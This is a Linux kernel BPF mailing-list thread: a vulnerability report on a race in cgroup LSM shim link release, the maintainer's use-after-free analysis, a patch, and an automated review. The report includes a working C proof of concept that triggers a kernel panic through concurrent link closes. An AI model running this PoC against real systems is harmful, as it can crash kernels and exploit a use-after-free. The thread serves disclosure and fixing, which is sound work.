bpf: Race condition in bpf_trampoline_unlink_cgroup_shim during concurrent cgroup LSM link release

梅开彦

Nov 25, 2025, 6:14:42 AM

to b...@vger.kernel.org, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org

Our fuzzer discovered a race condition vulnerability in the BPF subsystem, specifically in the release path for cgroup-attached LSM programs. When multiple BPF cgroup links attached to the same LSM hook are released concurrently, a race condition in `bpf_trampoline_unlink_cgroup_shim` can lead to state corruption, triggering a kernel warning (`ODEBUG bug in __init_work`) and a subsequent kernel panic.

Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Vulnerability Description

The vulnerability is triggered when multiple threads concurrently close file descriptors corresponding to `bpf_cgroup_link`s that share a common underlying `bpf_shim_tramp_link`. The `bpf_link_put` function, which is called during the release path, is not designed to handle concurrent calls on the same link instance when its reference count is low. This race leads to the re-initialization of an already-active `work_struct`, a memory state corruption that is detected by the kernel's debug objects feature.

## Root Cause

1. **Shared `shim_link`**: When BPF LSM programs are attached to a cgroup for a specific LSM hook, the kernel may create a single, shared `bpf_shim_tramp_link` (herein `shim_link`) for that hook. This `shim_link` is reference-counted. If multiple `bpf_cgroup_link`s are created for this same hook (e.g., by attaching the same program to different cgroups), they all share and hold a reference to this `shim_link`.

2. **Concurrent Release**: When these `bpf_cgroup_link`s are released concurrently (e.g., by `close()`-ing their file descriptors from multiple threads), the release handler for each link, `bpf_cgroup_link_release`, is invoked. This in turn calls `bpf_trampoline_unlink_cgroup_shim`.

3. **Race Condition**: The `bpf_trampoline_unlink_cgroup_shim` function looks up the shared `shim_link` and calls `bpf_link_put()` on it. The problem is that this function lacks proper locking to serialize the find-and-put operation on the shared `shim_link`.

4. **State Corruption**: `bpf_link_put()` is not designed to be called concurrently on the same link instance when its reference count is about to drop to zero. The race allows two threads to enter a critical section where both might evaluate the reference count and one proceeds to call `INIT_WORK()` on the link's `work_struct` while it's already been scheduled by the other thread, leading to the `ODEBUG bug in __init_work` warning and subsequent panic. This indicates a corruption of the internal state of the `shim_link` object.

## Reproduction Steps

The vulnerability is reproduced by the PoC we provide below. Its logic is as follows:

1. **Load Program**: A minimal BPF LSM program is loaded into the kernel.
2. **Create Shared State**: The PoC attaches this single BPF program to **two different** cgroups. This creates two independent `bpf_cgroup_link`s (and their file descriptors), but crucially, they both share a single underlying `shim_link` object, whose reference count becomes 2.
3. **Trigger Race**: The PoC creates two threads. Each thread is passed one of the two link file descriptors. The threads then attempt to `close()` the descriptors concurrently.
4. **Amplify Probability**: To ensure the small race window is hit, the attach-and-concurrently-close process is repeated in a tight loop (`NUM_ITERATIONS` times).

This repeated, concurrent invocation of the release path reliably triggers the race condition in `bpf_trampoline_unlink_cgroup_shim`.

## Crash Report

```
[ 79.070173][ T9925] ------------[ cut here ]------------
[ 79.070435][ T9925] ODEBUG: init active (active state 0) object: ffff888029de8d28 object type: work_struct hint: bpf_link0
[ 79.071026][ T9925] WARNING: lib/debugobjects.c:612 at debug_print_object+0x1a2/0x2b0, CPU#0: poc/9925
[ 79.071410][ T9925] Modules linked in:
[ 79.071587][ T9925] CPU: 0 UID: 0 PID: 9925 Comm: poc Not tainted 6.18.0-rc5-next-20251111 #6 PREEMPT(full)
[ 79.071995][ T9925] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 79.072360][ T9925] RIP: 0010:debug_print_object+0x1a2/0x2b0
[ 79.072599][ T9925] Code: fc ff df 48 89 fa 48 c1 ea 03 80 3c 02 00 75 54 41 56 48 8b 14 dd a0 93 d1 8b 4c 89 e6 48 c7 c7d
[ 79.073371][ T9925] RSP: 0018:ffffc90007d2fb38 EFLAGS: 00010286
[ 79.073620][ T9925] RAX: 0000000000000000 RBX: 0000000000000003 RCX: ffffffff817b20de
[ 79.073949][ T9925] RDX: ffff88802304be00 RSI: ffffffff817b20eb RDI: 0000000000000001
[ 79.074269][ T9925] RBP: 0000000000000001 R08: 0000000000000001 R09: ffffed100c484851
[ 79.074588][ T9925] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff8bd18e80
[ 79.074906][ T9925] R13: ffffffff8b6c6080 R14: ffffffff81d36450 R15: ffffc90007d2fbf8
[ 79.075226][ T9925] FS: 00007f2e4303b6c0(0000) GS:ffff8880cda4e000(0000) knlGS:0000000000000000
[ 79.075586][ T9925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 79.075853][ T9925] CR2: 00007f2e42839f78 CR3: 000000010f55c000 CR4: 0000000000752ef0
[ 79.076177][ T9925] PKRU: 55555554
[ 79.076324][ T9925] Call Trace:
[ 79.076460][ T9925] <TASK>
[ 79.076581][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.076823][ T9925] __debug_object_init+0x229/0x390
[ 79.077312][ T9925] ? __pfx___debug_object_init+0x10/0x10
[ 79.077551][ T9925] ? bpf_lsm_find_cgroup_shim+0xfe/0x3a0
[ 79.077787][ T9925] __init_work+0x51/0x60
[ 79.077967][ T9925] ? __cgroup_bpf_run_lsm_socket+0x9e1/0xa40
[ 79.078211][ T9925] bpf_link_put+0x54/0x180
[ 79.078395][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.078660][ T9925] bpf_trampoline_unlink_cgroup_shim+0x1f2/0x2f0
[ 79.078926][ T9925] ? __pfx_bpf_trampoline_unlink_cgroup_shim+0x10/0x10
[ 79.079204][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.079467][ T9925] ? __pfx_radix_tree_delete_item+0x10/0x10
[ 79.079710][ T9925] ? find_held_lock+0x2b/0x80
[ 79.079907][ T9925] ? __pfx_bpf_link_release+0x10/0x10
[ 79.080131][ T9925] bpf_cgroup_link_release.part.0+0x382/0x4b0
[ 79.080371][ T9925] bpf_cgroup_link_release+0x41/0x50
[ 79.080587][ T9925] bpf_link_free+0xf0/0x390
[ 79.080775][ T9925] bpf_link_release+0x61/0x80
[ 79.080972][ T9925] __fput+0x407/0xb50
[ 79.081142][ T9925] fput_close_sync+0x114/0x210
[ 79.081340][ T9925] ? __pfx_fput_close_sync+0x10/0x10
[ 79.081555][ T9925] ? dnotify_flush+0x7e/0x4c0
[ 79.081754][ T9925] __x64_sys_close+0x93/0x120
[ 79.081953][ T9925] do_syscall_64+0xcb/0xfa0
[ 79.082144][ T9925] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 79.082386][ T9925] RIP: 0033:0x7f2e431379ca
[ 79.082568][ T9925] Code: 48 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c 24 0c e8 63 ce f8 ff 8b 7c 244
[ 79.083335][ T9925] RSP: 002b:00007f2e4303ae90 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 79.083672][ T9925] RAX: ffffffffffffffda RBX: 00007f2e4303b6c0 RCX: 00007f2e431379ca
[ 79.083990][ T9925] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000007
[ 79.084309][ T9925] RBP: 00007f2e4303aed0 R08: 0000000000000000 R09: 00007fff74a263a7
[ 79.084626][ T9925] R10: 0000000000000008 R11: 0000000000000293 R12: ffffffffffffff80
[ 79.084943][ T9925] R13: 0000000000000000 R14: 00007fff74a262b0 R15: 00007f2e4283b000
[ 79.085269][ T9925] </TASK>
[ 79.085395][ T9925] Kernel panic - not syncing: kernel: panic_on_warn set ...
[ 79.085685][ T9925] CPU: 0 UID: 0 PID: 9925 Comm: poc Not tainted 6.18.0-rc5-next-20251111 #6 PREEMPT(full)
[ 79.086084][ T9925] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 79.086446][ T9925] Call Trace:
[ 79.086581][ T9925] <TASK>
[ 79.086702][ T9925] dump_stack_lvl+0x3d/0x1b0
[ 79.086892][ T9925] vpanic+0x67e/0x710
[ 79.087060][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.087273][ T9925] panic+0xc7/0xd0
[ 79.087428][ T9925] ? __pfx_panic+0x10/0x10
[ 79.087616][ T9925] ? check_panic_on_warn+0x24/0xc0
[ 79.087827][ T9925] check_panic_on_warn+0xb6/0xc0
[ 79.088036][ T9925] __warn+0x10d/0x3f0
[ 79.088201][ T9925] ? __wake_up_klogd.part.0+0x9e/0x100
[ 79.088426][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.088642][ T9925] report_bug+0x2e1/0x500
[ 79.088822][ T9925] ? debug_print_object+0x1a2/0x2b0
[ 79.089040][ T9925] handle_bug+0x2dd/0x410
[ 79.089222][ T9925] exc_invalid_op+0x35/0x80
[ 79.089412][ T9925] asm_exc_invalid_op+0x1a/0x20
[ 79.089614][ T9925] RIP: 0010:debug_print_object+0x1a2/0x2b0
[ 79.089854][ T9925] Code: fc ff df 48 89 fa 48 c1 ea 03 80 3c 02 00 75 54 41 56 48 8b 14 dd a0 93 d1 8b 4c 89 e6 48 c7 c7d
[ 79.090618][ T9925] RSP: 0018:ffffc90007d2fb38 EFLAGS: 00010286
[ 79.090865][ T9925] RAX: 0000000000000000 RBX: 0000000000000003 RCX: ffffffff817b20de
[ 79.091183][ T9925] RDX: ffff88802304be00 RSI: ffffffff817b20eb RDI: 0000000000000001
[ 79.091500][ T9925] RBP: 0000000000000001 R08: 0000000000000001 R09: ffffed100c484851
[ 79.091818][ T9925] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff8bd18e80
[ 79.092137][ T9925] R13: ffffffff8b6c6080 R14: ffffffff81d36450 R15: ffffc90007d2fbf8
[ 79.092455][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.092695][ T9925] ? __warn_printk+0x17e/0x310
[ 79.092892][ T9925] ? __warn_printk+0x18b/0x310
[ 79.093092][ T9925] ? debug_print_object+0x1a1/0x2b0
[ 79.093307][ T9925] ? __pfx_bpf_link_put_deferred+0x10/0x10
[ 79.093549][ T9925] __debug_object_init+0x229/0x390
[ 79.093762][ T9925] ? __pfx___debug_object_init+0x10/0x10
[ 79.094001][ T9925] ? bpf_lsm_find_cgroup_shim+0xfe/0x3a0
[ 79.094235][ T9925] __init_work+0x51/0x60
[ 79.094410][ T9925] ? __cgroup_bpf_run_lsm_socket+0x9e1/0xa40
[ 79.094653][ T9925] bpf_link_put+0x54/0x180
[ 79.094837][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.095100][ T9925] bpf_trampoline_unlink_cgroup_shim+0x1f2/0x2f0
[ 79.095358][ T9925] ? __pfx_bpf_trampoline_unlink_cgroup_shim+0x10/0x10
[ 79.095636][ T9925] ? __pfx___cgroup_bpf_run_lsm_current+0x10/0x10
[ 79.095897][ T9925] ? __pfx_radix_tree_delete_item+0x10/0x10
[ 79.096144][ T9925] ? find_held_lock+0x2b/0x80
[ 79.096340][ T9925] ? __pfx_bpf_link_release+0x10/0x10
[ 79.096562][ T9925] bpf_cgroup_link_release.part.0+0x382/0x4b0
[ 79.096816][ T9925] bpf_cgroup_link_release+0x41/0x50
[ 79.097035][ T9925] bpf_link_free+0xf0/0x390
[ 79.097224][ T9925] bpf_link_release+0x61/0x80
[ 79.097420][ T9925] __fput+0x407/0xb50
[ 79.097590][ T9925] fput_close_sync+0x114/0x210
[ 79.097787][ T9925] ? __pfx_fput_close_sync+0x10/0x10
[ 79.098007][ T9925] ? dnotify_flush+0x7e/0x4c0
[ 79.098207][ T9925] __x64_sys_close+0x93/0x120
[ 79.098404][ T9925] do_syscall_64+0xcb/0xfa0
[ 79.098593][ T9925] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 79.098834][ T9925] RIP: 0033:0x7f2e431379ca
[ 79.099016][ T9925] Code: 48 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c 24 0c e8 63 ce f8 ff 8b 7c 244
[ 79.099781][ T9925] RSP: 002b:00007f2e4303ae90 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 79.100120][ T9925] RAX: ffffffffffffffda RBX: 00007f2e4303b6c0 RCX: 00007f2e431379ca
[ 79.100440][ T9925] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000007
[ 79.100757][ T9925] RBP: 00007f2e4303aed0 R08: 0000000000000000 R09: 00007fff74a263a7
[ 79.101077][ T9925] R10: 0000000000000008 R11: 0000000000000293 R12: ffffffffffffff80
[ 79.101394][ T9925] R13: 0000000000000000 R14: 00007fff74a262b0 R15: 00007f2e4283b000
[ 79.101719][ T9925] </TASK>
[ 79.102160][ T9925] Kernel Offset: disabled
```

## Proof of Concept

The following C program demonstrates the vulnerability on linux-next-20251111 (commit 2666975a8905776d306bee01c5d98a0395bda1c9).

To successfully run the PoC, you need to obtain the BTF ID for `bpf_lsm_socket_create` and set the definition `ATTACH_BTF_ID_socket_create` to this value. You can retrieve this BTF ID using the following command: `bpftool btf dump file path-to-your-vmlinux | grep bpf_lsm_socket_create`.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <sys/resource.h>
#include <pthread.h>

#define CGROUP1_PATH "/tmp/cgroup_poc_1"
#define CGROUP2_PATH "/tmp/cgroup_poc_2"
#define LOG_BUF_SIZE 65536
#define NUM_ITERATIONS 1000 // Increased loop count to improve hit probability

// ============================================================================
// Important: This BTF ID is kernel version specific.
// You must find the correct ID for your kernel and update the value below.
// ============================================================================
#define ATTACH_BTF_ID_socket_create 198174

// Wrapper for bpf() system call
static long bpf(int cmd, union bpf_attr *attr, unsigned int size) {
    return syscall(__NR_bpf, cmd, attr, size);
}

// Simple BPF program: int func() { return 0; }
struct bpf_insn bpf_prog_insns[] = {
    { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 },
    { .code = BPF_JMP | BPF_EXIT },
};

// Helper function to create cgroup v2 directory
static int setup_cgroup(const char *path) {
    if (mkdir(path, 0755) && errno != EEXIST) {
        perror("mkdir cgroup path");
        return -1;
    }
    if (mount("none", path, "cgroup2", 0, NULL)) {
        if (errno != EBUSY && errno != EINVAL) {
            fprintf(stderr, "Warning: could not mount cgroup2 at %s: %s\n",
                    path, strerror(errno));
        }
    }
    return open(path, O_RDONLY | O_DIRECTORY);
}

// Thread worker function to close file descriptor
void *close_worker(void *arg) {
    long fd = (long)arg;
    if (close(fd) != 0) {
        // Under high concurrency, this may fail due to race conditions, which can be ignored
    }
    return NULL;
}

int main(void) {
    union bpf_attr prog_attr = {}, link_attr = {};
    int cgroup_fd1, cgroup_fd2, prog_fd;
    char bpf_log_buf[LOG_BUF_SIZE] = {0};

    struct rlimit rlim = {RLIM_INFINITY, RLIM_INFINITY};
    if (setrlimit(RLIMIT_MEMLOCK, &rlim)) {
        perror("setrlimit(RLIMIT_MEMLOCK)");
        return 1;
    }

    printf("Setting up cgroups...\n");
    cgroup_fd1 = setup_cgroup(CGROUP1_PATH);
    if (cgroup_fd1 < 0) return 1;
    cgroup_fd2 = setup_cgroup(CGROUP2_PATH);
    if (cgroup_fd2 < 0) return 1;

    // 1. Load BPF program (only needs to be loaded once)
    prog_attr.prog_type = BPF_PROG_TYPE_LSM;
    prog_attr.expected_attach_type = BPF_LSM_CGROUP;
    prog_attr.insn_cnt = sizeof(bpf_prog_insns) / sizeof(struct bpf_insn);
    prog_attr.insns = (uint64_t)bpf_prog_insns;
    prog_attr.license = (uint64_t)"GPL";
    prog_attr.attach_btf_id = ATTACH_BTF_ID_socket_create;
    prog_attr.log_buf = (uint64_t)bpf_log_buf;
    prog_attr.log_size = LOG_BUF_SIZE;
    prog_attr.log_level = 1;

    printf("Loading BPF program...\n");
    prog_fd = bpf(BPF_PROG_LOAD, &prog_attr, sizeof(prog_attr));
    if (prog_fd < 0) {
        fprintf(stderr, "Error: BPF_PROG_LOAD failed: %s\n", strerror(errno));
        fprintf(stderr, "------ Verifier Log ------\n%s\n------------------------\n", bpf_log_buf);
        goto cleanup_cgroups;
    }

    printf("Starting %d iterations to trigger the race condition...\n", NUM_ITERATIONS);
    for (int i = 0; i < NUM_ITERATIONS; i++) {
        if (i % 100 == 0) printf("Iteration %d...\n", i);

        link_attr.link_create.prog_fd = prog_fd;
        link_attr.link_create.attach_type = BPF_LSM_CGROUP;

        // 2. Repeatedly attach program to two cgroups in loop
        link_attr.link_create.target_fd = cgroup_fd1;
        int link_fd1 = bpf(BPF_LINK_CREATE, &link_attr, sizeof(link_attr));
        if (link_fd1 < 0) {
            perror("BPF_LINK_CREATE for cgroup 1 failed");
            continue; // Continue to next iteration
        }

        link_attr.link_create.target_fd = cgroup_fd2;
        int link_fd2 = bpf(BPF_LINK_CREATE, &link_attr, sizeof(link_attr));
        if (link_fd2 < 0) {
            perror("BPF_LINK_CREATE for cgroup 2 failed");
            close(link_fd1);
            continue; // Continue to next iteration
        }

        // 3. Concurrent close of two links to attempt triggering race condition
        pthread_t th1, th2;
        pthread_create(&th1, NULL, close_worker, (void *)(long)link_fd1);
        pthread_create(&th2, NULL, close_worker, (void *)(long)link_fd2);

        pthread_join(th1, NULL);
        pthread_join(th2, NULL);
    }

    printf("\nPoC finished. Please check kernel logs (`dmesg`).\n");

    close(prog_fd);
    close(cgroup_fd1);
    close(cgroup_fd2);
    return 0;

cleanup_cgroups:
    close(cgroup_fd1);
    close(cgroup_fd2);
    return 1;
}
```

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the attachment.

config-20251111

Martin KaFai Lau

Dec 1, 2025, 3:22:32 PM

to 梅开彦, Stanislav Fomichev, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org

On 11/25/25 3:14 AM, 梅开彦 wrote:
> Our fuzzer discovered a race condition vulnerability in the BPF subsystem, specifically in the release path for cgroup-attached LSM programs. When multiple BPF cgroup links attached to the same LSM hook are released concurrently, a race condition in `bpf_trampoline_unlink_cgroup_shim` can lead to state corruption, triggering a kernel warning (`ODEBUG bug in __init_work`) and a subsequent kernel panic.
>
> Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
> Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
> Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>
>
> ## Vulnerability Description
>
> The vulnerability is triggered when multiple threads concurrently close file descriptors corresponding to `bpf_cgroup_link`s that share a common underlying `bpf_shim_tramp_link`. The `bpf_link_put` function, which is called during the release path, is not designed to handle concurrent calls on the same link instance when its reference count is low. This race leads to the re-initialization of an already-active `work_struct`, a memory state corruption that is detected by the kernel's debug objects feature.

I don't think concurrent bpf_link_put(same_link) is the issue.
bpf_link_put uses an atomic link->refcnt to handle this situation.

The race should be between the bpf_link_put() in
bpf_trampoline_unlink_cgroup_shim() and the cgroup_shim_find() in
bpf_trampoline_link_cgroup_shim(). The cgroup_shim_find() in
bpf_trampoline_link_cgroup_shim() gets a shim_link with a refcnt 0, then
a UAF.
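
[Illustration] The interleaving described above can be replayed in a small single-threaded userspace model. This is only a sketch: `model_link`, `model_put`, `model_find`, and `model_race_window` are hypothetical names, not kernel code. The model assumes the final put merely queues the cleanup and that the lookup does not look at the refcount.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for the shim link; not the kernel's struct. */
struct model_link {
    atomic_long refcnt;
    bool on_list;    /* still reachable through the lookup */
    int queue_count; /* how many times deferred cleanup was queued */
};

/* Models bpf_link_put(): the final put only queues the cleanup. */
static void model_put(struct model_link *l)
{
    if (atomic_fetch_sub(&l->refcnt, 1) != 1)
        return;
    l->queue_count++; /* unlinking from the list happens later */
}

/* Models cgroup_shim_find(): ignores the refcount entirely. */
static struct model_link *model_find(struct model_link *l)
{
    return l->on_list ? l : NULL;
}

/* Replays the interleaving; returns how often cleanup was queued. */
static int model_race_window(void)
{
    struct model_link l = { .on_list = true };
    atomic_init(&l.refcnt, 1);

    model_put(&l);                             /* releaser: 1 -> 0, cleanup queued */
    struct model_link *found = model_find(&l); /* attacher: entry is still listed */
    assert(found != NULL);
    atomic_fetch_add(&found->refcnt, 1);       /* unconditional inc: 0 -> 1 */
    model_put(found);                          /* next release: 1 -> 0, queued again */
    return l.queue_count;
}
```

Under this interleaving the cleanup is queued twice for the same object, which is consistent with the `INIT_WORK()` on an already-active `work_struct` seen in the report.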

The changes in commit ab5d47bd41b1 ("bpf: Remove in_atomic() from
bpf_link_put().") made this bug easier to manifest as in the reproducer
because the bpf_trampoline_unlink_prog() is always delayed.

A potential fix is to check the link->refcnt in
bpf_trampoline_unlink_cgroup_shim() and call
bpf_trampoline_unlink_prog() when needed inside the
mutex_lock(&tr->mutex). Cc: Stanislav
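
[Illustration] One way to read the suggestion above is that the final put should remove the entry from the lookup structure while the same mutex that protects the lookup is held. The following userspace sketch shows that idea with pthreads. All names (`shim`, `tr_slot`, `shim_get`, `shim_put`, `run_model`) are hypothetical, and a plain counter under the mutex stands in for the atomic refcount; it is not the kernel change itself.

```c
#include <assert.h>
#include <pthread.h>
#include <stdlib.h>

struct shim { long refcnt; };

static pthread_mutex_t tr_mutex = PTHREAD_MUTEX_INITIALIZER;
static struct shim *tr_slot; /* models the single list entry */
static long zero_ref_seen;   /* lookups that found refcnt == 0 */

/* Attach: reuse the listed shim or create one, all under the mutex. */
static struct shim *shim_get(void)
{
    pthread_mutex_lock(&tr_mutex);
    struct shim *s = tr_slot;
    if (s) {
        if (s->refcnt == 0)
            zero_ref_seen++;
        s->refcnt++;
    } else {
        s = calloc(1, sizeof(*s));
        assert(s != NULL);
        s->refcnt = 1;
        tr_slot = s;
    }
    pthread_mutex_unlock(&tr_mutex);
    return s;
}

/* Release: the final put unlinks the shim before dropping the mutex. */
static void shim_put(struct shim *s)
{
    pthread_mutex_lock(&tr_mutex);
    int last = (--s->refcnt == 0);
    if (last)
        tr_slot = NULL;
    pthread_mutex_unlock(&tr_mutex);
    if (last)
        free(s); /* nobody can find it any more */
}

static void *worker(void *arg)
{
    (void)arg;
    for (int i = 0; i < 100000; i++)
        shim_put(shim_get());
    return NULL;
}

/* Runs two attach/release loops; returns the zero-refcount lookups seen. */
static long run_model(void)
{
    pthread_t t[2];
    for (int i = 0; i < 2; i++) {
        int rc = pthread_create(&t[i], NULL, worker, NULL);
        assert(rc == 0);
        (void)rc;
    }
    for (int i = 0; i < 2; i++)
        pthread_join(t[i], NULL);
    return zero_ref_seen;
}
```

Because unlinking and the final decrement happen in one critical section, a lookup in this model can never return an entry whose count has already reached zero.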

梅开彦

Dec 1, 2025, 11:49:28 PM

to Martin KaFai Lau, Stanislav Fomichev, dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org

> -----Original Message-----
> From: "Martin KaFai Lau" <marti...@linux.dev>
> Sent: 2025-12-02 04:21:57 (Tuesday)
> To: "梅开彦" <kai...@hust.edu.cn>, "Stanislav Fomichev" <s...@fomichev.me>
> Cc: dan...@iogearbox.net, hust-os-ker...@googlegroups.com, ddd...@hust.edu.cn, dz...@hust.edu.cn, a...@kernel.org, b...@vger.kernel.org
> Subject: Re: bpf: Race condition in bpf_trampoline_unlink_cgroup_shim during concurrent cgroup LSM link release

Thank you for the correction and analysis.
This is very helpful for our subsequent work!

xulang

Feb 6, 2026, 2:14:33 AM

to marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xulang

Based on Martin KaFai Lau's suggestions, I have created a simple patch.

The root cause of this bug is that when `bpf_link_put` reduces the
refcount of `shim_link->link.link` to zero, the resource is considered
released but may still be referenced via `tr->progs_hlist` in
`cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
`bpf_shim_tramp_link_release` is deferred. During this window, another
process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.

To fix this:
1. Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
Only increment the refcount if it is not already zero.
2. Guard the freeing of `shim_link` with `tr->mutex` to prevent release
while the mutex is held.
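
[Illustration] Step 1 relies on "increment unless zero" semantics. A minimal userspace sketch with C11 atomics is given here for readers unfamiliar with the pattern; `ref_inc_not_zero` and `reuse_or_create` are hypothetical names that model, rather than reproduce, the kernel's `atomic64_inc_not_zero()` and the reuse branch in `bpf_trampoline_link_cgroup_shim`.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Take a reference only if the count is currently non-zero. */
static bool ref_inc_not_zero(atomic_long *refcnt)
{
    long old = atomic_load(refcnt);
    while (old != 0) {
        /* On failure, 'old' is refreshed with the current value. */
        if (atomic_compare_exchange_weak(refcnt, &old, old + 1))
            return true;
    }
    return false; /* object is already on its way out */
}

/* Returns 1 if an existing entry was reused, 0 if a new one is needed. */
static int reuse_or_create(atomic_long *existing)
{
    if (existing && ref_inc_not_zero(existing))
        return 1;
    return 0;
}
```

A count of zero is treated the same as "not found", so the caller falls through to the allocation path instead of resurrecting an entry whose cleanup is already pending.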

Testing:
I used a non-rigorous method to verify the fix by adding a delay in
`bpf_link_put` to make the bug easier to trigger:

 void bpf_link_put(struct bpf_link *link)
 {
 	if (!atomic64_dec_and_test(&link->refcnt))
 		return;
+	msleep(100);
 	INIT_WORK(&link->work, bpf_link_put_deferred);
 	schedule_work(&link->work);
 }

Before the patch, running a PoC easily reproduced the crash (often within
dozens of iterations) with a call trace similar to KaiyanM's report.
After the patch, the bug no longer occurs even after millions of
iterations.

Signed-off-by: xulang <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 14 ++++++++++----
1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index 976d89011b15..c16a53cca5e0 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -702,15 +702,23 @@ static void bpf_shim_tramp_link_release(struct bpf_link *link)
 		return;

 	WARN_ON_ONCE(bpf_trampoline_unlink_prog(&shim_link->link, shim_link->trampoline, NULL));
-	bpf_trampoline_put(shim_link->trampoline);
 }

 static void bpf_shim_tramp_link_dealloc(struct bpf_link *link)
 {
 	struct bpf_shim_tramp_link *shim_link =
 		container_of(link, struct bpf_shim_tramp_link, link.link);
+	struct bpf_trampoline *tr = shim_link->trampoline;

+	if (!tr) {
+		kfree(shim_link);
+		return;
+	}
+
+	mutex_lock(&tr->mutex);
 	kfree(shim_link);
+	mutex_unlock(&tr->mutex);
+	bpf_trampoline_put(tr);
 }

 static const struct bpf_link_ops bpf_shim_tramp_link_lops = {
@@ -800,10 +808,8 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
 	mutex_lock(&tr->mutex);

 	shim_link = cgroup_shim_find(tr, bpf_func);
-	if (shim_link) {
+	if (shim_link && atomic64_inc_not_zero(&shim_link->link.link.refcnt)) {
 		/* Reusing existing shim attached by the other program. */
-		bpf_link_inc(&shim_link->link.link);
-
 		mutex_unlock(&tr->mutex);
 		bpf_trampoline_put(tr); /* bpf_trampoline_get above */
 		return 0;
--
2.50.1

bot+b...@kernel.org

Feb 6, 2026, 2:50:48 AM

to xul...@uniontech.com, marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com, and...@kernel.org, marti...@kernel.org, edd...@gmail.com, yongho...@linux.dev, c...@meta.com, ihor.s...@linux.dev

commit 55b1614b50eb05449d35281100cacc591d1aca3a
Author: xulang <xul...@uniontech.com>

bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim

This commit fixes a use-after-free race in the BPF cgroup shim handling.
When bpf_link_put() reduces the refcount to zero but before the deferred
cleanup runs, another thread can find the shim via cgroup_shim_find() and
attempt to increment its refcount. The fix uses atomic64_inc_not_zero()
to detect and handle this race.

This commit appears to fix a bug introduced by commit 69fd337a975c
("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call that
could resurrect a zero-refcount link. Should this patch include a Fixes:
tag?

Suggested:
Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")

---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/21742563414

AI-authorship-score: medium
AI-authorship-explanation: The commit message uses markdown-style formatting (backticks) and has a structured, verbose explanatory style that is atypical of kernel patches, though the technical content is sound.
issues-found: 1
issue-severity-score: low
issue-severity-explanation: Missing Fixes: tag for a major bug fix; the fix itself is technically correct.
